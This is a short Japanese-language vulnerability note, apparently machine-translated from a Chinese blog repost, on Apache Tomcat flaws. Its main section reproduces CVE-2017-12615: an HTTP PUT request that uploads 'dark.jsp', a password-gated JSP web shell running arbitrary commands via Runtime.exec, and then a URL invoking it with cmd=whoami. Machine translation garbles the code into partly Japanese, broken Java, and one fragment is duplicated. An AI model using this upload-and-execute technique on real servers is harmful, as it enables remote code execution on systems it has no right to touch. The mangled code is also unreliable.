アプリケーションセキュリティ - ミドルウェア - Tomcatの - 脆弱性 - 概要

弱いパスワード管理の背景のTomcat

Tomcatは任意のファイルの脆弱性を書きます

CVE-2019-0232

CVE-2019-0211

 

CVE-2017から12615

DATE
 2017 

の範囲 
 のApache Tomcat 7.0 0 - 7.0 81 

前提条件 
のweb.xml(1)(2)HTTPプロトコルのサポートPUT要求の再生






(1)契約

PUT /dark.jsp HTTP / 1.1
ホスト:xx.xx.163.193:8083
のUser-Agent:Mozillaの/ 5.0(Windows NTの10.0; Win64の、x64の、RV:71.0)のGecko / 20100101 Firefoxの/ 71.0
受け入れ:text / htmlで、アプリケーション/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
受け入れ言語:ZH-CN、ZH; Q = 0.8、ZH-TW; Q = 0.7、ZH-HKを、Q = 0.5、 EN-US; Q = 0.3、EN; Q = 0.2
受け入れエンコード:gzipで、デフレート
DNT:1つの
接続:キープアライブ
のアップグレード-安全でない-要求:1
プラグマ:キャッシュなし
のCache-Control:キャッシュなしの
コンテンツ長:1039

 
 

<%@ページ言語= "javaの" インポート= "java.utilの。*、java.io. *" pageEncodingは= "UTF-8" %> <%!公共の静的な文字列excuteCmd(列C){StringBuilderのライン=新しいStringBuilderの();試み{プロセスプロ= Runtime.getRuntime()EXEC(C); BufferedReaderのBUF =新しいBufferedReaderの(新しいInputStreamReaderの(pro.getInputStream()));文字列のTEMP = NULL;一方((TEMP = buf.readLine( ))!= NULL){line.append(TEMP

 
 

<%@ページ言語= "javaの" インポート= "java.utilの。*、java.io. *" pageEncodingは= "UTF-8" %> <%!公共の静的な文字列excuteCmd(列C){StringBuilderのライン=新しいStringBuilderの();試み{プロセスプロ= Runtime.getRuntime()EXEC(C); BufferedReaderのBUF =新しいBufferedReaderの(新しいInputStreamReaderの(pro.getInputStream()));文字列のTEMP = NULL;一方((TEMP = buf.readLine( ))!= NULL){line.append(TEMP

 
 

+ "\\ N");} buf.close();}キャッチ(例外e){line.append(e.getMessage());}戻りline.toString();}%> <%であれば(「023 」.equals(request.getParameter( "PWD"))&&! ""。(request.getParameter( "CMD"))){out.printlnを( "<PRE>" + excuteCmd(request.getParameter( "CMD" に等しいです))+ "</ PRE>");}他{out.printlnを( ":-)");}%>


(2)コマンド実行
xx.xx.163.193 :? 8083 / dark.jsp&PWD = 023&CMD = WHOAMI

 


CVE-2017から12616
の範囲:Apache Tomcatの7.0.0 - 7.0.80
前提条件:server.xmlの-VirtualDirContext-デフォルトなし-手動で追加

CVE-2017から12617-TomcatのRCE
のApache Tomcat 7.0.0 - 7.0.81


サービスの脆弱性Apache Tomcatのリモートブロック要求拒否(CVE-2014から0075)

おすすめ

転載: www.cnblogs.com/AtesetEnginner/p/12050338.html